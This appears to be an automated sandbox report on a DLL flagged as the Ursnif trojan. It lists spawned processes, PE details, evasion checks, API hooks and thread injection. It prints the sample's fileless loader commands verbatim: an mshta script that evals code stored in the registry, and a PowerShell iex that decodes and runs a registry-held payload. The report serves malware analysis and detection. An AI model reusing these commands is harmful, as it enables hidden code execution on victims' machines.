Source: C:\Windows\System32\Speech_OneCore\common\SpeechRuntime.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\System32\Speech_OneCore\common\SpeechRuntime.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: unknown

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll,Grewrace

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll'
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll,Grewrace
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll,Put
Source: unknown	Process created: C:\Windows\System32\Speech_OneCore\common\SpeechRuntime.exe C:\Windows\System32\Speech_OneCore\Common\SpeechRuntime.exe -Embedding
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7068 CREDAT:17410 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7068 CREDAT:17420 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7068 CREDAT:82966 /prefetch:2
Source: unknown	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll,Grewrace	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll,Put	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7068 CREDAT:17410 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7068 CREDAT:17420 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7068 CREDAT:82966 /prefetch:2	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Source: SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: ;C:\Users\user\AppData\Local\Temp\jomxz5kw\jomxz5kw.pdb source: powershell.exe, 00000027.00000002.565926797.000001E05F926000.00000004.00000001.sdmp
Source:	Binary string: c:\oxygenCondition\AlwaysIron\whoseReceive\Chargejoin\senthelp\Go.pdb source: loaddll32.exe, 00000001.00000002.638145001.000000006D936000.00000002.00020000.sdmp, SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll
Source:	Binary string: ;C:\Users\user\AppData\Local\Temp\jomxz5kw\jomxz5kw.pdbXP source: powershell.exe, 00000027.00000002.565926797.000001E05F926000.00000004.00000001.sdmp
Source:	Binary string: ;C:\Users\user\AppData\Local\Temp\qidcr3ig\qidcr3ig.pdb source: powershell.exe, 00000027.00000002.565926797.000001E05F926000.00000004.00000001.sdmp
Source:	Binary string: ;C:\Users\user\AppData\Local\Temp\qidcr3ig\qidcr3ig.pdbXP source: powershell.exe, 00000027.00000002.565926797.000001E05F926000.00000004.00000001.sdmp

Source: SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation:

Suspicious powershell command line found

Show sources

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))			Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6D8E2193 push ecx; ret	1_2_6D8E21A3
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6D8E2140 push ecx; ret	1_2_6D8E2149
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6D8FD3F0 push ecx; mov dword ptr [esp], ecx	1_2_6D8FD3F1
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6D954477 pushad ; retf	1_2_6D95451E

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000001.00000003.466452806.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.466569570.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.476403108.0000000003C0B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.466493019.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.466366881.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.466524516.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000003.519858248.000001E074880000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.466612626.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.466599382.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.466417450.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7048, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6720, type: MEMORY

Hooks registry keys query functions (used to hide registry keys)

Show sources

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW

Modifies the export address table of user mode modules (user mode EAT hooks)

Show sources

Source: explorer.exe

IAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFFAC2D521C

Modifies the import address table of user mode modules (user mode IAT hooks)

Show sources

Source: explorer.exe

EAT of a user mode module has changed: module: WININET.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFFAC2D5200

Modifies the prolog of user mode functions (user mode inline hooks)

Show sources

Source: explorer.exe

User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00

Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Source: C:\Windows\System32\mshta.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2913			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6007			Jump to behavior

Source: C:\Windows\System32\Speech_OneCore\common\SpeechRuntime.exe TID: 6596	Thread sleep time: -30000s >= -30000s			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4816	Thread sleep time: -9223372036854770s >= -30000s			Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_6D921B50 FindFirstFileExW,std::_Timevec::_Timevec,FindNextFileW,

1_2_6D921B50

Source: SpeechRuntime.exe, 00000015.00000003.408044845.00000255BD37A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAWX
Source: SpeechRuntime.exe, 00000015.00000002.429992119.00000255BF480000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: SpeechRuntime.exe, 00000015.00000003.407826903.00000255BD33C000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW0
Source: SpeechRuntime.exe, 00000015.00000003.408044845.00000255BD37A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: mshta.exe, 00000026.00000003.498767463.0000022639476000.00000004.00000001.sdmp	Binary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}/
Source: SpeechRuntime.exe, 00000015.00000002.429992119.00000255BF480000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: SpeechRuntime.exe, 00000015.00000002.429992119.00000255BF480000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: SpeechRuntime.exe, 00000015.00000003.404478120.00000255BD348000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: SpeechRuntime.exe, 00000015.00000002.429992119.00000255BF480000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Windows\System32\loaddll32.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_6D91C480 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

1_2_6D91C480

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_6D925480 OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,__aligned_msize,__aligned_msize,__aligned_msize,__aligned_msize,__aligned_msize,__aligned_msize,__aligned_msize,__cftoe,__aligned_msize,GetFileType,WriteConsoleW,GetLastError,__cftoe,WriteFile,WriteFile,OutputDebugStringW,__CrtDbgReportWV,

1_2_6D925480

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6D9211D0 mov ecx, dword ptr fs:[00000030h]	1_2_6D9211D0
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6D914880 mov eax, dword ptr fs:[00000030h]	1_2_6D914880
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6D921310 mov ecx, dword ptr fs:[00000030h]	1_2_6D921310
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6D9525FE mov eax, dword ptr fs:[00000030h]	1_2_6D9525FE
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6D952534 mov eax, dword ptr fs:[00000030h]	1_2_6D952534
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6D95213B push dword ptr fs:[00000030h]	1_2_6D95213B

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6D91C480 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_6D91C480
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6D906930 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_6D906930
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6D906AA0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_6D906AA0

HIPS / PFW / Operating System Protection Evasion:

Compiles code for process injection (via .Net compiler)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File written: C:\Users\user\AppData\Local\Temp\qidcr3ig\qidcr3ig.0.cs

Jump to dropped file

Creates a thread in another existing process (thread injection)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread created: unknown EIP: AE131580

Jump to behavior

Maps a DLL or memory area into another process

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Section loaded: unknown target: unknown protection: execute and read and write

Jump to behavior

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread register set: target process: 3292

Jump to behavior

Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior

Source: unknown

Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'

Source: loaddll32.exe, 00000001.00000002.630147501.00000000019D0000.00000002.00000001.sdmp	Binary or memory string: uProgram Manager
Source: loaddll32.exe, 00000001.00000002.630147501.00000000019D0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000001.00000002.630147501.00000000019D0000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: loaddll32.exe, 00000001.00000002.630147501.00000000019D0000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_6D906610 cpuid

1_2_6D906610

Source: C:\Windows\System32\loaddll32.exe

Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,

1_2_6D8E1B13

Source: C:\Windows\System32\loaddll32.exe

